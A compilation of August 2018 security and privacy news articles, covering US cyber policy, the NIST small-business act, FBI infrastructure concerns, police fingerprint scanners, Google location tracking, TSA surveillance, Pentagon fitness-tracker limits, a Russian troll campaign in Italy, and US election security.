17.8.2018 securityweek BigBrothers

SANTIAGO, Chile (AP) — U.S. Defense Secretary Jim Mattis and his Chilean counterpart have signed an agreement pledging closer cooperation in combating cyber threats.

Mattis and Defense Minister Alberto Espina held a signing ceremony Thursday after meeting to discuss a range of security issues, including military exercises and cooperation in science and technology. Cyber defense is a topic of growing interest throughout the Western Hemisphere. Banco de Chile, one of the country's biggest commercial banks, has said a hacking operation robbed it of $10 million in June.

Santiago was the fourth stop for Mattis on a tour of South America that began in Brasilia on Sunday. He also visited Rio de Janeiro and Buenos Aires and is scheduled to hold talks in Bogota, Colombia, on Friday.

NIST Small Business Cybersecurity Act Becomes Law
16.8.2018 securityweek BigBrothers

The NIST Small Business Cybersecurity Act Aims to Provide Cyberdefense Resources

U.S. President Donald Trump signed the NIST Small Business Cybersecurity Act, S. 770 (formerly known as the MAIN STREET Cybersecurity Act) into law on Tuesday (August 14, 2018). It requires NIST to "disseminate clear and concise resources to help small business concerns identify, assess, manage, and reduce their cybersecurity risks."

The resources to be provided are informational. They must be generally applicable to a wide range of small businesses; vary with the nature and size of small businesses; promote cybersecurity awareness and workplace cybersecurity culture; and include practical application strategies. The resources must further be technology-neutral and compatible with COTS solutions; and as far as possible consistent with international standards and the Stevenson-Wydler Technology Innovation Act of 1980.

Use of these resources by small businesses is voluntary.

The bi-partisan act was authored by U.S. Senators Brian Schatz (D-Hawai'i) and James Risch (R-Idaho), and co-sponsored by Senators John Thune (R-S.D.), Maria Cantwell (D-Wash.), Bill Nelson (D-Fla.), Cory Gardner (R-Colo.), Catherine Cortez Masto (D-Nev.), Maggie Hassan (D-N.H.), Claire McCaskill (D-Mo.), and Kirsten Gillibrand (D-N.Y.).

"As businesses rely more and more on the internet to run efficiently and reach more customers, they will continue to be vulnerable to cyberattacks. But while big businesses have the resources to protect themselves, small businesses do not, and that's exactly what makes them an easy target for hackers," said Schatz, lead Democrat on the Commerce Subcommittee on Communications Technology, Innovation, and the Internet, in a statement. "This new law will give small businesses the tools to firm up their cybersecurity infrastructure and fight online attacks."

The act has been well-received by the security industry.

"Bills focusing on the cybersecurity needs of small businesses are becoming increasingly necessary to protect activity crucial to the U.S. economy," explains Jessica Ortega, a member of the SiteLock research team. "Small businesses account for 99.7% [SBA figures] of employers in the United States and as many as 50% [CNBC figures] of those have experienced a cyberattack. Not surprising when you consider that websites are attacked as many as 50 times per day on average [Sitelock's own figures].

She adds, "The NIST Small Business Cybersecurity Act aims to provide cyberdefense resources for small businesses by creating a set of guidelines for basic security measures that should be easy to follow and implement affordably. It also creates guidelines for making security best practices a required component of corporate training and workplace culture, something that is very needed as cyberthreats continue to evolve."

Small businesses, and many large organizations, struggle to comply with the existing NIST Security Framework. "This change sets the stage for greater compliance and readiness from smaller organizations who previously thought that NIST compliance was too costly or complex to obtain," adds Dr. Bret Fund, founder and CEO at SecureSet.

The basic problem is small organizations cannot afford extensive cybersecurity resources in-house, while many still believe they will not be a target for cyber attackers. "Small businesses are not immune to threats, and are often not equipped with the IT resources or personnel to protect their networks," warns Dirk Morris, chief product officer at Untangle. Small businesses are a major direct target for business email compromise (BEC) and ransomware https://www.securityweek.com/ransomware-where-its-been-and-where-its-going attacks; and as part of the supply chain for larger organizations they are targeted for both credential theft and island-hopping to the larger target.

Counterintuitively, small businesses suffer more from a successful attack than do the larger companies. "In fact," suggests Anupam Sahai, Vice President of Product Management at Cavirin, "recent reports shows that smaller businesses lose proportionately more to cyberattacks since they are targeted just as often, and are less able to recover due to less resilient infrastructures."

The same report highlighted by Sahai also points out that smaller companies paying lower salaries have a proportionately higher number of grey hats working for them, making them more susceptible to insider threats.

While the security industry generally applauds this new act, it still suffers from one major drawback -- use of the new NIST resources by small businesses is voluntary.

"I will be curious to see how this plan is carried out," says Francis Dinha, CEO and co-founder of OpenVPN. "Many small businesses neglect cyber security because they aren't aware and don't understand the risks -- so, they don't seek out solutions. But if they're not seeking out solutions now, what makes anyone think they will seek out these new NIST resources?"

The act, he says, "does not seem to specify how to connect or engage with small businesses in these practices. It only requires NIST to make resources, in the form of guidelines, methodologies, and other information, available online. I'm concerned this won't be enough. If small businesses aren't engaged in a more active way, they may miss this opportunity and remain at risk."

A complaint often heard at SecurityWeek from harassed CISOs is, "If it's not a regulation, it won't happen." Perhaps what is required as a next step is a small business cybersecurity framework that can be audited. Larger organizations can then insist that smaller companies they engage must show compliance to the NIST small business cybersecurity framework -- but even that will create problems. Small companies with great new ideas will continue to develop their idea without intrinsic security -- and the larger companies will have to choose between a great new non-conformant idea and an older conformant solution.

This new act is a great help in assisting those small businesses that wish to improve their cybersecurity to do so. But it needs to be made a requirement before it will seriously improve the overall cybersecurity posture of the nation.

Senate Passes MAIN STREET Cybersecurity Act for Small Business
16.8.2018 securityweek BigBrothers

The U.S. Senate has passed the MAIN STREET Cybersecurity Act on Sept. 28, which will require NIST to "disseminate clear and concise resources to help small business concerns identify, assess, manage, and reduce their cybersecurity risks."

Co-sponsored by Senators Maria Cantwell (D-WA), Brian Schatz (D-HI), James Risch (R-ID), John Thune (R-SD) and Bill Nelson (D-Fla.), and introduced in March 2017, MAIN STREET's full title is 'Making Available Information Now to Strengthen Trust and Resilience and Enhance Enterprise Technology Cybersecurity Act of 2017'.

The basic requirement is that NIST shall provide cybersecurity resources specifically geared for small businesses (SMEs). Those resources are to promote awareness of simple, basic controls; a workplace cybersecurity culture; and third-party stakeholder relationships, in order to assist SMEs in mitigating common cybersecurity risks. The resources are to be technology-neutral that can be implemented using commercial and off-the-shelf technologies.

They are to be consistent with the requirements of the Cybersecurity Enhancement Act of 2014, which gave more weight and support to the NIST Cybersecurity Framework. While widely used by large organizations, the NIST framework is usually ignored by SMEs.

In a statement of support for MAIN STREET issued in March, Sen. John Thune, chairman of the Senate Committee on Commerce, Science, and Transportation, pointed out that SMEs provide more than half of all jobs in the U.S., but are unprepared for the effect of cyberattacks. According to figures from the National Cybersecurity Alliance, 60% of small businesses are forced to close following an attack.

"Cyberattacks can have catastrophic effects on small businesses and their customers," he said. "This legislation offers important resources, specifically meeting the unique needs of small businesses, to help them guard sensitive data and systems from thieves and hackers."

"In 2012, nearly 71 percent of cyberattacks occurred in businesses with fewer than 100 employees," said Senator Risch. "These attacks seriously compromise not only the businesses, but also their employees' and customers' personal information. As we work to reduce our nation's cyber vulnerabilities, we must be equally mindful of our responsibility to uniformly educate all small business owners on how to deter these threats."

The small business version of the NIST Framework will need to provide a cybersecurity framework that does not require the high level of investment needed for the full NIST Framework. However, like the full version, it will be voluntary for business. Whether SMBs actually derive practical benefit remains to be seen.

The Ponemon 2016 State of Cybersecurity in SMBs survey found that 50% of small businesses had suffered a data breach in the previous 12 months. SMEs are clearly a target for cybercriminal attacks, but are unprepared to stop them. The primary reasons are twofold: SMEs often think they are too small to be a target, and that effective security can only be achieved with the resources of a large organization.

The first is simply wrong: small businesses are increasingly targeted for extortion (such as ransomware) and credential theft (especially where that business might be part of the supply chain of larger organizations). It is hoped that the new small business Cybersecurity Act will change the second.

A survey of 1,420 small business owners published in March 2017 by Manta suggests that only 69% of small business owners currently have controls in place to prevent hacks -- meaning 1 in 3 small business owners have no safeguards in place. Where controls are used, they tend to be basic: such as antivirus software (17%), firewalls (16%), and spam filters (14%).

"Overall," concludes Manta, "with the growth in hackers targeting small businesses, owners should invest more heavily in cyber defense to prevent attacks, which can often be more crippling for a small business than a large corporation."

Andy Halataei, Senior Vice President for Government Affairs of the Information Technology Industry Council, said at the time the bill was introduced, "Small businesses often don't have the resources they need to guard against sophisticated cyber-attacks, and this legislation can be the helping hand small businesses need to help reduce their cybersecurity risks." He added, "By offering small businesses federal agencies' resources and coordinated support, they can better manage risks, protect customer privacy, and focus on growing their ventures."

The reality for small businesses today is that they face threats from both criminals and government legislation. Legal regulatory requirements, like common cybercriminals, do not differentiate hugely between large and small businesses. For example, any business of whatever size that does business with a member state of the European Union will be subject to the strict requirements of the European General Data Protection Regulation (GDPR) by May 2018.

The MAIN STREET Cybersecurity Act of 2017 will hopefully help SMEs protect themselves from both hackers and regulators. It is expected that this Act will rapidly pass through the final stages to become law.

FBI Eyes Plethora of River-Related Threats
15.8.2018 securityweek BigBrothers

NEW ORLEANS (AP) — Giant cranes loading and unloading gargantuan barges. Oil tankers, supply vessels and pipelines serving a vital energy industry. Flood control structures. Chemical plants. Cruise ships. Drinking water sources. All computer-reliant and tied in some way to the internet. All of them vulnerable to cyber thieves, hackers and terrorists.

Roughly nine months into his job as special agent in charge of the New Orleans office of the FBI, agent Eric Rommal is keenly aware of the dangers cyber-criminals pose to Mississippi River-related businesses and south Louisiana infrastructure.

"Louisiana is a major cyber vulnerability area," Rommal told The Associated Press in an interview.

"Every time that we have a vessel that travels up or down the Mississippi River there's a vulnerability: that that vessel or persons on those vessels may in fact be doing harm to our systems," said Rommal. "And that affects the national economy and affects the entire United States."

Rommal, accompanied by Matthew Ramey, who supervises the office's cyber squad, and Drew Watts, an assistant special agent in charge, discussed a litany of vulnerable areas and the ways the FBI in New Orleans works to protect them.


"When it relates to commerce and the economy throughout the United States, oil and gas — it all starts here," said Rommal. "And when those systems are compromised, it doesn't just affect Louisiana. It affects the entire nation."

ICS Cyber Security Conference

A cyber disruption of security systems that protect pipelines and refineries "could essentially cripple the oil and gas industry until we could get that system up and running again," said Rommal.

Energy isn't the only concern.

"The ports that are along the Mississippi River — many may think of them as an agricultural or a petroleum depot. But what we need to know more about is that each one of those systems is controlled by sort of computer network that allows barges to be off-loaded, loaded," he said.

A hacker disrupting those operations could effectively disrupt nationwide and international commerce, he said, until it could be manually restored.


Ports and the businesses that use them are susceptible to theft of money or critical information, Ramey said. And the theft can be state-sponsored.

"That would be, say, the Chinese, the Russians, the Iranians, the North Koreans, want to compromise the ports for, say, some sort of economic or secretive information. The maritime and the port industry are susceptible to what we call BEC — business email compromises," Ramey said.

"Wire transfers are going out all the time, 24/7. If the attacker can insert himself into that email chain, they can assume the identity of the person who controls that account." And that can lead to money being diverted to unintended sources.

FBI statistics show some 41,000 victims lost $2.9 billion to cyber-thieves nationally from October 2013 to May 2018, said Ramey. Over $5 million left the state in 2017 due to cyber-thieves, he said, adding: "In 2018, we're on track to surpass that."


Offshore there are drilling rigs and production platforms. Inland, refineries and chemical plants line the river. Compromise of their computer systems and safety systems could lead to disaster, Rommal said.

"We're confident that the internal security systems owned by each one of those companies have mitigation plans to prevent terrible disasters from happening," he said. "But, nonetheless, it's something that we think about every day."

In addition, the agents acknowledged threats to public utilities — New Orleans, for instance, draws its drinking water from the river — and various flood-control structures and pumping systems.

Register for SecurityWeek’s ICS Cyber Security Conference


Rommal said more than 20 people working for the FBI headquarters in Louisiana are working on cyber security.

They include experts working at forensics labs, doing forensics on computer hard drives and developing techniques for analyzing computer memories in efforts to fight and find intruders.

And, Rommal said, there are partnerships with other federal agencies, including a joint effort known as the National Cyber Investigative Joint Terrorism Task Force.

There is also the national InfraGard, an FBI program that enlists thousands of private-industry partners from potential cybercrime target sectors, such as such as transportation, energy, banking and infrastructure. Ramey said there are 800 members in Louisiana.

Participants can provide and receive real-time information on imminent cyber threats.

The FBI also maintains a website for its Internet Crime Complaint Center. It's a mechanism for businesses and individuals to report cybercrime, and a source of information on the ever-evolving threat.

"We're not in this fight alone," said Rommal. "And it is a fight."

UK Police Deploy Homemade Mobile Fingerprint Scanners
15.8.2018 securityweek BigBrothers

The UK Metropolitan Police Service -- the Met, the UK's largest police force and one of the largest in the world -- has introduced a new portable fingerprint scanner. This is not the first portable scanner used by the Met, but differs from the earlier option by being developed in-house.

Known as INK (identity not known), it combines software produced in-house by Met staff with an Android mobile phone paired with a Cross Match Technologies fingerprint reader. The device communicates securely with the Home Office Biometric Services Gateway (BSG), which then searches the Criminal Records Office (IDENT1) and immigration enforcement (IABS) databases.

If a suspect has a criminal record, the Met says, or is known to immigration enforcement, his or her identity can be confirmed at the roadside. An officer, with relevant access levels, can also use the device to check the Police National Computer to establish if they are currently wanted for any outstanding offences.

The statement made it clear that all fingerprints taken on the device are deleted automatically once the officer logs off the device. The 2017 Vault 7 CIA documents leaked by WikiLeaks seem to indicate that the CIA used a tool called ExpressLane to surreptitiously collect biometric data recorded by other Cross Match devices in the U.S.

Miami-based Cross Match Technologies provides biometric management systems to law enforcement and governments. In 2011 it was reported that a Cross Match device was used to identify Osama Bin Laden, allowing then president Obama to announce his death.

UK Met Police Fingerprint scanner

For now, the Met devices cannot be used to increase the size of the national fingerprint database regardless of whether the subject is convicted of a crime. However, there seems little to prevent this development in the future.

The Police and Criminal Evidence Act 1984 (PACE) allows fingerprints to be taken if a constable reasonably suspects the subject of committing or attempting to commit an offence, or they have committed or attempted to commit an offence, and: the name of the person is unknown to, and cannot be readily ascertained by, the constable -- or if the constable has reasonable grounds for doubting whether a name given by the person is their real name.

Again under PACE, fingerprints may be stored by the police for 2-3 years (more if the courts grant an extension) or indefinitely if the subject is subsequently convicted of an offense. However, it is worth noting that European attitudes towards fingerprinting are changing. In April 2018, the European Commission proposed that all identity cards held by European citizens should be required to include a digital image of the holder's fingerprints.

The driving force behind the new scanners is, however economy of both police funds and officers' time. Project lead Superintendent Adrian Hutchinson, explained, "Mobile identification technology helps officers to do their jobs efficiently and effectively. For example, if police stop a driver for a traffic violation but the driver has no documents on him and the car is registered to another person officers may not be happy that the name given is correct. INK can allow them to confirm the identity to allow the service of a summons, rather than arrest them and take them to a police station where they then confirm their identity. Also, if the person is wanted for other offences, this device will allow us to establish this at the point they are stopped."

The reduced cost of the new devices will allow the Met to increase their usage from less than 100 to 600 devices in the field, to be rolled out over the next six months. It is believed that the failure rate for a scanned fingerprint is around one in 7,000.

It is not immediately clear whether this is the same device that was described by the West Yorkshire Police earlier this year. On 10 February, the Home Office announced, "An app on an officer's phone, combined with a handheld scanner, will mean police will be able to check fingerprints against both criminal and immigration records by connecting to the two live databases (IDENT1 and IABS) via the new Biometric Services Gateway... It is expected that another 20 forces across the country will roll out the system by the end of this year."

A Westminster press conference that would answer such details, scheduled for Tuesday was canceled following an incident at Westminster on Monday evening. A vehicle was driven at speed into crash barriers outside the Houses of Parliament, injuring several pedestrians and cyclists. It is being treated as terror-related and investigated by the Met's counter-terrorism police -- who have said that the identity of the driver is not yet confirmed.

Google tracks users’ movements even if they have disabled the “Location History” on devices
14.8.2018 securityaffairs BigBrothers

According to the AP, many Google services on both Android and iPhone store records of user location even if the users have disabled the “Location History”.
According to a recent investigation conducted by the Associated Press, many Google services on both Android and iPhone devices store records of user location data, and the bad news is that they do it even if the users have disabled the “Location History” on devices.

When a user disables the “Location History” from the privacy settings of Google applications, he should prevent Google from stole location data.

Currently, the situation is quite different, experts from AP discovered that even when users have turned off the Location History, some Google apps automatically store “time-stamped location data” without explicit authorization.

“Google says that will prevent the company from remembering where you’ve been. Google’s support page on the subject states: “You can turn off Location History at any time. With Location History off, the places you go are no longer stored.”

That isn’t true. Even with Location History paused, some Google apps automatically store time-stamped location data without asking. (It’s possible, although laborious, to delete it .)” reads the post published by AP.

“For example, Google stores a snapshot of where you are when you merely open its Maps app. Automatic daily weather updates on Android phones pinpoint roughly where you are,”

“And some searches that have nothing to do with location, like “chocolate chip cookies,” or “kids science kits,” pinpoint your precise latitude and longitude—accurate to the square foot—and save it to your Google account.”

The AP has used location data from an Android smartphone with ‘Location History’ disabled to desing a map of the movements of Princeton postdoctoral researcher Gunes Acar.

Location History

Data plotted on the map includes records of Dr. Acar’s train commute on two trips to New York and visits to the High Line park, Chelsea Market, Hell’s Kitchen, Central Park and Harlem other markers on the map, including Acar’s home address.

“The privacy issue affects some two billion users of devices that run Google’s Android operating software and hundreds of millions of worldwide iPhone users who rely on Google for maps or search.” continues the AP.
Google replied to the study conducted by the AP with the following statement:

“There are a number of different ways that Google may use location to improve people’s experience, including Location History, Web, and App Activity, and through device-level Location Services. We provide clear descriptions of these tools, and robust controls so people can turn them on or off, and delete their histories at any time.” states Google.

Jonathan Mayer, a Princeton researcher and former chief technologist for the FCC’s enforcement bureau, remarked that location history data should be disabled when the users switch off’ the Location History,

“If you’re going to allow users to turn off something called ‘Location History,’ then all the places where you maintain location history should be turned off. That seems like a pretty straightforward position to have.”

The good news is it is possible to stop Google from collecting your location, it is sufficient to turn off the “Web and App Activity” setting, anyway, Google will continue to store location markers.

Open your web browser, go to myactivity.google.com, select “Activity Controls” and now turn off the “Web & App Activity” and “Location History. features”

For Android Devices:
Go to the “Security & location” setting, select “Privacy”, and tap “Location” and toggle it off.

For iOS Devices:
Google Maps users can access Settings → Privacy Location Services and change their location setting to ‘While Using’ the app.

Google Tracks Your Movements, Like It or Not
13.8.2018 securityweek BigBrothers

Google wants to know where you go so badly that it records your movements even when you explicitly tell it not to.

An Associated Press investigation found that many Google services on Android devices and iPhones store your location data even if you've used privacy settings that say they will prevent it from doing so.

Computer-science researchers at Princeton confirmed these findings at the AP's request.

For the most part, Google is upfront about asking permission to use your location information. An app like Google Maps will remind you to allow access to location if you use it for navigating. If you agree to let it record your location over time, Google Maps will display that history for you in a "timeline" that maps out your daily movements.

Storing your minute-by-minute travels carries privacy risks and has been used by police to determine the location of suspects — such as a warrant that police in Raleigh, North Carolina, served on Google last year to find devices near a murder scene. So the company will let you "pause" a setting called Location History.

Google says that will prevent the company from remembering where you've been. Google's support page on the subject states: "You can turn off Location History at any time. With Location History off, the places you go are no longer stored."

That isn't true. Even with Location History paused, some Google apps automatically store time-stamped location data without asking.

For example, Google stores a snapshot of where you are when you merely open its Maps app. Automatic daily weather updates on Android phones pinpoint roughly where you are. And some searches that have nothing to do with location, like "chocolate chip cookies," or "kids science kits," pinpoint your precise latitude and longitude — accurate to the square foot — and save it to your Google account.

The privacy issue affects some two billion users of devices that run Google's Android operating software and hundreds of millions of worldwide iPhone users who rely on Google for maps or search.

Storing location data in violation of a user's preferences is wrong, said Jonathan Mayer, a Princeton computer scientist and former chief technologist for the Federal Communications Commission's enforcement bureau. A researcher from Mayer's lab confirmed the AP's findings on multiple Android devices; the AP conducted its own tests on several iPhones that found the same behavior.

"If you're going to allow users to turn off something called 'Location History,' then all the places where you maintain location history should be turned off," Mayer said. "That seems like a pretty straightforward position to have."

Google says it is being perfectly clear.

"There are a number of different ways that Google may use location to improve people's experience, including: Location History, Web and App Activity, and through device-level Location Services," a Google spokesperson said in a statement to the AP. "We provide clear descriptions of these tools, and robust controls so people can turn them on or off, and delete their histories at any time."

To stop Google from saving these location markers, the company says, users can turn off another setting, one that does not specifically reference location information. Called "Web and App Activity" and enabled by default, that setting stores a variety of information from Google apps and websites to your Google account.

When paused, it will prevent activity on any device from being saved to your account. But leaving "Web & App Activity" on and turning "Location History" off only prevents Google from adding your movements to the "timeline," its visualization of your daily travels. It does not stop Google's collection of other location markers.

You can delete these location markers by hand, but it's a painstaking process since you have to select them individually, unless you want to delete all of your stored activity.

You can see the stored location markers on a page in your Google account at myactivity.google.com, although they're typically scattered under several different headers, many of which are unrelated to location.

To demonstrate how powerful these other markers can be, the AP created a visual map of the movements of Princeton postdoctoral researcher Gunes Acar, who carried an Android phone with Location history off, and shared a record of his Google account.

The map includes Acar's train commute on two trips to New York and visits to The High Line park, Chelsea Market, Hell's Kitchen, Central Park and Harlem. To protect his privacy, The AP didn't plot the most telling and frequent marker — his home address.

Huge tech companies are under increasing scrutiny over their data practices, following a series of privacy scandals at Facebook and new data-privacy rules recently adopted by the European Union. Last year, the business news site Quartz found that Google was tracking Android users by collecting the addresses of nearby cellphone towers even if all location services were off. Google changed the practice and insisted it never recorded the data anyway.

Critics say Google's insistence on tracking its users' locations stems from its drive to boost advertising revenue.

"They build advertising information out of data," said Peter Lenz, the senior geospatial analyst at Dstillery, a rival advertising technology company. "More data for them presumably means more profit."

The AP learned of the issue from K. Shankari, a graduate researcher at UC Berkeley who studies the commuting patterns of volunteers in order to help urban planners. She noticed that her Android phone prompted her to rate a shopping trip to Kohl's, even though she had turned Location History off.

"So how did Google Maps know where I was?" she asked in a blog postq.

The AP wasn't able to recreate Shankari's experience exactly. But its attempts to do so revealed Google's tracking. The findings disturbed her.

"I am not opposed to background location tracking in principle," she said. "It just really bothers me that it is not explicitly stated."

Google offers a more accurate description of how Location History actually works in a place you'd only see if you turn it off — a popup that appears when you "pause" Location History on your Google account webpage. There the company notes that "some location data may be saved as part of your activity on other Google services, like Search and Maps."

Google offers additional information in a popup that appears if you re-activate the "Web & App Activity" setting — an uncommon action for many users, since this setting is on by default. That popup states that, when active, the setting "saves the things you do on Google sites, apps, and services ... and associated information, like location."

Warnings when you're about to turn Location History off via Android and iPhone device settings are more difficult to interpret. On Android, the popup explains that "places you go with your devices will stop being added to your Location History map." On the iPhone, it simply reads, "None of your Google apps will be able to store location data in Location History."

The iPhone text is technically true if potentially misleading. With Location History off, Google Maps and other apps store your whereabouts in a section of your account called "My Activity," not "Location History."

Since 2014, Google has let advertisers track the effectiveness of online ads at driving foot traffic , a feature that Google has said relies on user location histories.

The company is pushing further into such location-aware tracking to drive ad revenue, which rose 20 percent last year to $95.4 billion. At a Google Marketing Live summit in July, Google executives unveiled a new tool called "local campaigns" that dynamically uses ads to boost in-person store visits. It says it can measure how well a campaign drove foot traffic with data pulled from Google users' location histories.

Google also says location records stored in My Activity are used to target ads. Ad buyers can target ads to specific locations — say, a mile radius around a particular landmark — and typically have to pay more to reach this narrower audience.

While disabling "Web & App Activity" will stop Google from storing location markers, it also prevents Google from storing information generated by searches and other activity. That can limit the effectiveness of the Google Assistant, the company's digital concierge.

Sean O'Brien, a Yale Privacy Lab researcher with whom the AP shared its findings, said it is "disingenuous" for Google to continuously record these locations even when users disable Location History. "To me, it's something people should know," he said.

Quiet Skies, TSA surveillance program targets Ordinary U.S. Citizens

11.8.2018 securityaffairs BigBrothers

Journalists revealed a new surveillance program that targets US citizens, the program was previously-undisclosed and code named ‘Quiet Skies’.
According to the Transportation Security Administration (TSA), that has admitted the Quiet Skies, the program has monitored about 5,000 U.S. citizens on domestic flights in recent months.

Quiet Skies was criticized by privacy advocates because the authorities have begun monitoring U.S. citizens that aren’t suspected of a crime or of involvement in terrorist organizations.

The domestic surveillance program aims at collecting extensive information about the movements of the citizens and their behaviour.

“The previously undisclosed program, called ‘Quiet Skies,’” specifically targets travelers who “are not under investigation by any agency and are not in the Terrorist Screening Data Base,” states a bulletin issued in March by the TSA.

The Agency is monitoring individuals who have spent a certain amount of time in specific countries, who have visited those counties within a certain period of time, or that have made a reservation which includes email addresses or phone numbers associated to terrorism suspects could trigger monitoring.

Passengers remain on the Quiet Skies watch list “for up to 90 days or three encounters, whichever comes first, after entering the United States,” according to the TSA. Travelers are not notified when they have been added to the watch list.

Every day about 40 to 50 people on domestic flights are selected under the Quiet Skies program and on average, air marshals follow and monitor about 35 of them.

Quiet skies program
Source atlantamusic.us

This type of surveillance activity is very expensive and according to the experts it drains resources from other vital activities.

At the time there are no data on the cost of the program or whether it allowed authoritied to neutralize any threat.

“Since this initiative launched in March, dozens of air marshals have raised concerns about the Quiet Skies program with senior officials and colleagues, sought legal counsel, and expressed misgivings about the surveillance program, according to interviews and documents reviewed by the Globe.”

Privacy advocates and experts on civil liberties considers the Quiet Skies program worrisome and potentially illegal:

Further details on the program are reported in the article titled “Quiet Skies– A TSA Surveillance Program Targets Ordinary U.S. Citizens” that I have published on the Infosec Institute website.

Pentagon Restricts Use of Fitness Trackers, Other Devices
7.8.2018 securityweek  BigBrothers

WASHINGTON (AP) — Military troops and other defense personnel at sensitive bases or certain high-risk warzone areas won't be allowed to use fitness-tracker or cellphone applications that can reveal their location, according to a new Pentagon order.

The memo, obtained by The Associated Press, stops short of banning the fitness trackers or other electronic devices, which are often linked to cellphone applications or smart watches and can provide the users' GPS and exercise details to social media. It says the applications on personal or government-issued devices present a "significant risk" to military personnel, so those capabilities must be turned off in certain operational areas.

Under the new order, military leaders will be able to determine whether troops under their command can use the GPS function on their devices, based on the security threat in that area or on that base.

"These geolocation capabilities can expose personal information, locations, routines, and numbers of DOD personnel, and potentially create unintended security consequences and increased risk to the joint force and mission," the memo said.

Defense personnel who aren't in sensitive areas will be able to use the GPS applications if the commanders conclude they don't present a risk. For example, troops exercising at major military bases around the country, such at Fort Hood in Texas or Norfolk Naval Station in Virginia, would likely be able to use the location software on their phones or fitness devices. Troops on missions in more sensitive locations, such as Syria, Iraq, Afghanistan or parts of Africa, meanwhile, would be restricted from using the devices or be required to turn off any location function.

Army Col. Rob Manning, a Pentagon spokesman, said it's a move to ensure the enemy can't easily target U.S. forces.

"It goes back to making sure that we're not giving the enemy an unfair advantage and we're not showcasing the exact locations of our troops worldwide," Manning said.

Concerns about exercise trackers and other electronic devices came to a head in January in the wake of revelations that an interactive, online map was pinpointing troop locations, bases and other sensitive areas around the world.

The Global Heat Map, published by the GPS tracking company Strava, used satellite information to map the locations of subscribers to Strava's fitness service. At the time, the map showed activity from 2015 through September 2017. And while heavily populated areas were well lit, warzones such as Iraq and Syria show scattered pockets of activity that could denote military or government personnel using fitness trackers as they move around.

The Pentagon immediately launched a review, noting that the electronic signals could potentially disclose the location of troops who are in secret or classified locations or on small forward operating bases in hostile areas.

This is the second memo affecting the use of cellphones and other electronic devices that the department has released in recent months. In May, defense officials laid out new restrictions for the use of cellphones and other mobile wireless devices inside the Pentagon.

That memo called for stricter adherence to long-held practices that require phones be left in storage containers outside secure areas where sensitive matters are discussed. But it also stopped short of banning the devices, and instead made clear that cellphones can still be used in common areas and other offices in the Pentagon if classified information is not present.

The latest memo says the new restrictions include GPS functions on fitness trackers, phones, tablets, smartwatches and other applications.

The Pentagon also said it will provide additional cybersecurity training to include the risks posed by the trackers and other mobile devices.

Heather Pierce, a spokeswoman for Fitbit, said Monday: "Fitbit is committed to protecting consumer privacy and keeping data safe. Unlike a smartphone, location data is not collected by Fitbit unless a user gives us access to the data, and users can always remove our access."

Russian troll factory suspected to be behind the attack against Italian President Mattarella
5.8.2018 securityweek BigBrothers

The Russian shadow behind the attack on Italian President Mattarella, a coordinated attack via Twitter involved hundreds of profiles inviting him to resign.
Cybersecurity experts and Italian media believe that the Italian President Sergio Mattarella is the last victim of the Russian troll farm.

On May 27 the late afternoon, thousands of Twitter profiles suddenly started spreading messages against the Italian president asking him to resign.

The messages appeared as a coordinated attack, they were using the hashtag #MattarellaDimettiti (Italian translation: “Mattarella resign”). Messages using this hashtag were rapidly spreading across the Internet, many other legitimate users started using it and it is quite easy to find similar legitimate message today.

But someone has triggered the protest online, someone who has clear interests to destabilize the Italian government.

Actual vice-premier Luigi Di Maio was asking for the indictment of President Mattarella who refused to endorse the choice of a candidate to the Minister of Economy because of his known anti-euro position.

The analysis of social media Twitter revealed that around at two o’clock in the morning there was an anomalous spike in the number of messages against the President Mattarella.

President Mattarella

Were they sleepless Italians or someone was attempting to influence the sentiment of the population on specific topics?

According to the Huffington Post Italy, in just a few minutes there were about 400 new profiles, that were traced back to a single origin, coordinating the misinformation campaign.

The Huffington Post reported that the Italian law enforcement Polizia Postale confirmed that the source of the campaign was one, but due to countermeasures adopted by the attackers was impossible to find the control room and attribute the attack to a specific threat actor.

“It is well known that, with high probability, it should have been created abroad, even if no one is able to say whether the Russian operators involved in disruptive actions in the American election campaign are involved.” states the Huffington Post citing the Italian newspaper Corriere della Sera.

According to the Huffington Post, at least twenty Twitter profiles involved in the attack against Italian President Mattarella belonging to completely unsuspecting Italians had been used one or more times by the Internet Research Agency (Ira) of Saint Petersburg, also known as the Russian troll factory.

The same accounts were involved in other propaganda campaigns in favor of populist parties, sovereignists, and anti-Europeans.

This is the conclusion of an analysis conducted on a sample composed of 67% of the archive related to the activity of the Internet Research Agency (Ira) that was published by the Firethirtyeight website.

The website published 3 Million Russian Troll tweets that were analyzed by the US prosecutor Robert Mueller as part of the investigation of the Russian influence on the 2016 Presidential election.

The huge number of tweets was collected by the researchers Darren Linvill and Patrick Warren from the Clemson University.

The archive includes roughly 16,000 tweets in the Italian language, according to the Italian newspaper Corriere della Sera, some of the accounts were particularly active and were fueling discussions against government representatives.

Now let me close with a simple consideration … the propaganda online attributed to the Internet Research Agency is really very noisy, and I fear it was designed to be so, likely under a wider diversionary strategy.

Involving more sophisticated technologies it is possible to obtain better results, let’s think of the involvement of artificial intelligence.

Putin said several times that the nation that leads in AI ‘will be the ruler of the world,’ and I’m sure that the involvement of machine learning systems in a troll factory can produce results much better than actual ones.

Is the Internet Research Agency itself the result of a bigger troll farm the already leverage artificial intelligence?

Trump Criticized for Not Leading Effort to Secure Elections
2.8.2018 securityweek BigBrothers

WASHINGTON (AP) — As alarms blare about Russian interference in U.S. elections, the Trump administration is facing criticism that it has no clear national strategy to protect the country during the upcoming midterms and beyond.

Both Republicans and Democrats have criticized the administration's response as fragmented, without enough coordination across federal agencies. And with the midterms just three months away, critics are calling on President Donald Trump to take a stronger stand on an issue critical to American democracy.

"There's clearly not enough leadership from the top. This is a moment to move," said Maryland Sen. Chris Van Hollen, head of the Democratic Senatorial Campaign Committee. "I don't think they are doing nearly enough."

Various government agencies have been at work to ensure safe voting. The FBI has set up a Foreign Influence Task Force and intelligence agencies are collecting information on Russian aggression.

But Trump himself rarely talks about the issue. And in the nearly two years since Russians were found to have hacked into U.S. election systems and manipulated social media to influence public opinion, the White House has held two meetings on election security.

One was last week. It ran 30 minutes.

The meeting resulted in no new presidential directive to coordinate the federal effort to secure the election, said Suzanne Spaulding, former undersecretary of homeland security who was responsible for cyber security and protecting critical infrastructure.

"Trump's failure to take a leadership role on this, up until this (National Security Council) meeting, misses an opportunity to send a clear message to states that this is a very serious threat," Spaulding said. "We did not get out of this NSC meeting a comprehensive, interagency strategy. It was each department and agency working in their silos."

Garrett Marquis, a spokesman for the NSC, said the government response is robust. He said NSC staff "leads the regular and continuous coordination of the whole-of-government approach to addressing foreign malign influence and ensuring election security."

